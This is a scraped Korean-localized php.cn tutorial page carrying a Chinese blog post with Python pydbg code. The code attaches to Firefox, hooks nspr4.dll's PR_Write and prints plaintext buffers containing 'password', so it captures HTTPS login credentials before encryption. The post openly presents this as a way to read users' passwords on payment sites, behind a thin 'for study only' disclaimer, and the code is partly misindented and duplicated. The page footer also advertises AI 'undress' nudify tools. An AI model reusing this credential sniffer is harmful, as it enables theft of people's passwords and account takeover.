python利用hook技术破解https的实例代码-파이썬 튜토리얼-php.cn

집

백엔드 개발

파이썬 튜토리얼

python利用hook技术破解https的实例代码

WBOYWBOYWBOYWBOYWBOYWBOYWBOYWBOYWBOYWBOYWBOYWBOYWB

Jun 06, 2016 am 11:27 AM

hook https

相对于http协议，http是的特点就是他的安全性，http协议的通信内容用普通的嗅探器可以捕捉到，但是https协议的内容嗅探到的是加密后的内容，对我们的利用价值不是很高，所以一些大的网站----涉及到“大米”的网站，采用的都是http是协议，嘿嘿，即便这样，还是有办法能看到他的用户名和密码的，嘿嘿，本文只是用于技术学习，只是和大家交流技术，希望不要用于做违法的事情，这个例子是在firefox浏览器下登录https协议的网站，我们预先打开程序，就来了个捕获用户名和密码：

下面是源代码：

代码如下:

#!/ur/bin/env python
from pydbg import *
from pydbg.defines import *

import utils
import sys

dbg = pydbg()
found_firefox = False

pattern = "password"


def ssl_sniff( dbg, args ):
    buffer = ""
    offset = 0

    while 1:
        byte = dbg.read_process_memory( args[1] + offset, 1 )
        if byte != "x00":
            buffer += byte
            offset += 1
            continue
        else:
            break
    if pattern in buffer:
        print "Pre-Encrypted: %s" % buffer
    return DBG_CONTINUE
# 寻找firefox.exe的进程
for (pid, name) in dbg.enumerate_processes():
    if name.lower() == "firefox.exe":
        found_firefox = True
        hooks = utils.hook_container()
        dbg.attach(pid)
        print "[*] Attaching to firefox.exe with PID: %d" % pid
# 得到firefox的hook的 address
        hook_address = dbg.func_resolve_debuggee("nspr4.dll","PR_Write")
        if hook_address:
# 添加hook的内容，包括他的pid，地址，嗅探类型

            hooks.add( dbg, hook_address, 2, ssl_sniff, None )
            print "[*] nspr4.PR_Write hooked at: 0x%08x" % hook_address
            break
        else:
            print "[*] Error: Couldn't resolve hook address."
            sys.exit(-1)
        if found_firefox:
            print "[*] Hooks set, continuing process."
            dbg.run()
        else:
                print "[*] Error: Couldn't find the firefox.exe process."
                sys.exit(-1)

if found_firefox:
    print "[*] Hooks set, continuing process."
    dbg.run()
else:
    print "[*] Error: Couldn't find the firefox.exe process."
    sys.exit(-1)

转自：http://world77.blog.bitsCN.com/414605/518679

본 웹사이트의 성명

본 글의 내용은 네티즌들의 자발적인 기여로 작성되었으며, 저작권은 원저작자에게 있습니다. 본 사이트는 이에 상응하는 법적 책임을 지지 않습니다. 표절이나 침해가 의심되는 콘텐츠를 발견한 경우 admin@php.cn으로 문의하세요.

핫 AI 도구

Undresser.AI Undress

사실적인 누드 사진을 만들기 위한 AI 기반 앱

AI Clothes Remover

사진에서 옷을 제거하는 온라인 AI 도구입니다.

Undress AI Tool

무료로 이미지를 벗다

Clothoff.io

AI 옷 제거제

AI Hentai Generator

AI Hentai를 무료로 생성하십시오.

뜨거운 도구

메모장++7.3.1

사용하기 쉬운 무료 코드 편집기

SublimeText3 중국어 버전

중국어 버전, 사용하기 매우 쉽습니다.

스튜디오 13.0.1 보내기

강력한 PHP 통합 개발 환경

드림위버 CS6

시각적 웹 개발 도구

SublimeText3 Mac 버전

신 수준의 코드 편집 소프트웨어(SublimeText3)

뜨거운 주제

Gmail 이메일의 로그인 입구는 어디에 있나요?

7335

자바 튜토리얼

1627

Cakephp 튜토리얼

1352

라라벨 튜토리얼

1264

PHP 튜토리얼

1209

Related knowledge

Nginx 프록시 관리자를 사용하여 HTTP에서 HTTPS로 자동 점프를 구현하는 방법 Sep 26, 2023 am 11:19 AM

NginxProxyManager를 사용하여 HTTP에서 HTTPS로의 자동 점프를 구현하는 방법 인터넷이 발전하면서 점점 더 많은 웹사이트가 HTTPS 프로토콜을 사용하여 데이터 전송을 암호화하여 데이터 보안과 사용자 개인 정보 보호를 향상시키기 시작했습니다. HTTPS 프로토콜에는 SSL 인증서 지원이 필요하므로 HTTPS 프로토콜 배포 시 특정 기술 지원이 필요합니다. Nginx는 강력하고 일반적으로 사용되는 HTTP 서버 및 역방향 프록시 서버이며 NginxProxy

Nginx 프록시 관리자를 사용하여 HTTPS 프로토콜에서 역방향 프록시를 구현하는 방법 Sep 26, 2023 am 08:40 AM

NginxProxyManager를 사용하여 HTTPS 프로토콜에서 역방향 프록시를 구현하는 방법 최근 몇 년 동안 인터넷의 인기와 응용 프로그램 시나리오의 다양화로 인해 웹 사이트 및 응용 프로그램의 액세스 방법이 점점 더 복잡해졌습니다. 웹사이트 액세스 효율성과 보안을 향상시키기 위해 많은 웹사이트에서는 사용자 요청을 처리하기 위해 역방향 프록시를 사용하기 시작했습니다. HTTPS 프로토콜의 역방향 프록시는 사용자 개인 정보를 보호하고 통신 보안을 보장하는 데 중요한 역할을 합니다. 이 기사에서는 NginxProxy를 사용하는 방법을 소개합니다.

SSL을 사용하는 Nginx: 웹 서버를 보호하기 위해 HTTPS 구성 Jun 09, 2023 pm 09:24 PM

Nginx는 고성능 웹 서버 소프트웨어이자 강력한 역방향 프록시 서버 및 로드 밸런서입니다. 인터넷의 급속한 발전과 함께 점점 더 많은 웹사이트가 민감한 사용자 데이터를 보호하기 위해 SSL 프로토콜을 사용하기 시작하고 있으며 Nginx도 강력한 SSL 지원을 제공하여 웹 서버의 보안 성능을 더욱 향상시킵니다. 이 글에서는 SSL 프로토콜을 지원하고 웹 서버의 보안 성능을 보호하기 위해 Nginx를 구성하는 방법을 소개합니다. SSL 프로토콜이란 무엇입니까? SSL(보안소켓

https 워크플로우는 어떤 모습인가요? Apr 07, 2024 am 09:27 AM

https 워크플로에는 클라이언트 시작 요청, 서버 응답, SSL/TLS 핸드셰이크, 데이터 전송 및 클라이언트 측 렌더링과 같은 단계가 포함되어 있으며 이러한 단계를 통해 전송 중 데이터의 보안과 무결성을 보장할 수 있습니다.

vue3 후크가 DataV의 전체 화면 컨테이너 구성 요소를 재구성하는 방법 May 16, 2023 pm 02:43 PM

fullScreenContainer.vueimport{useAutoResize}from'@/hooks/useAutoResize' const{autoBindRef}=useAutoResize() 구성요소 생성을 구현하고, 후크를 사용자 정의하고, autoBindRef 바인딩 참조 사용자 정의 후크 파일 useAutoResize.tsimport{ref}from'을 내보냅니다. vue' ;exportfunctionuseAutoResize(){l

Nginx 방화벽이 HTTPS 보안 통신을 보장하는 방법 Jun 10, 2023 am 10:16 AM

오늘날의 인터넷 시대에 보안통신은 필수불가결한 부분이 되었습니다. 특히 HTTPS 통신에서는 보안을 확보하는 방법이 특히 중요합니다. 널리 사용되는 웹 서버 및 역방향 프록시 서버인 Nginx의 방화벽은 HTTPS 보안 통신을 보장하는 데에도 중요한 역할을 할 수 있습니다. 이 기사에서는 다음 측면에서 Nginx 방화벽에 대해 설명합니다. TLS/SSL 암호화 HTTPS 통신의 보안은 주로 TLS/SSL 암호화 기술을 기반으로 하며, 이는 전송 중에 데이터가 전송되는 것을 방지할 수 있습니다.

Nginx를 사용하여 HTTPS 양방향 인증을 구현하는 방법 Jun 03, 2023 pm 08:38 PM

단방향 확인과 양방향 확인의 차이점: 단방향 확인: 클라이언트가 서버측 인증서를 확인하는 것을 말하며 서버는 클라이언트 인증서를 확인할 필요가 없습니다. 양방향 검증: 클라이언트가 서버측 인증서를 검증하는 것을 말하며, 서버도 CA의 공개키 인증서를 통해 클라이언트 인증서를 검증해야 합니다. 세부 핸드셰이크 프로세스: 단방향 인증 브라우저가 보안 서버에 연결 요청을 보냅니다. 1. 서버는 자신의 인증서와 인증서 관련 정보를 클라이언트 브라우저로 보냅니다. 2. 클라이언트 브라우저는 서버가 보낸 인증서가 자신이 신뢰하는 CA 센터에서 발급된 것인지 확인합니다. 그렇다면 계약을 계속 실행하고 그렇지 않으면 클라이언트의 브라우저는 클라이언트에게 이 인증서를 신뢰할 수 없다고 경고하고 계속해야 하는지 묻는 경고 메시지를 표시합니다. 3. 고객 픽업

Tomcat에서 https를 구성하는 방법 Jan 05, 2024 pm 05:15 PM

구성 단계: 1. SSL 인증서를 얻습니다. 2. SSL 인증서를 구성합니다. 3. Tomcat 구성 파일을 편집합니다. 자세한 소개: 1. 자체 서명된 인증서 또는 인증 기관(예: Let's Encrypt)으로부터 유효한 SSL 인증서 중 하나를 획득해야 합니다. 2. 획득한 SSL 인증서와 개인 키 파일을 서버에 배치하고 이러한 파일이 안전한 위치에 있는지 확인하고, 충분한 권한이 있는 사용자만 액세스할 수 있도록 하세요. 3. Tomcat 구성 파일 등을 편집하세요.

See all articles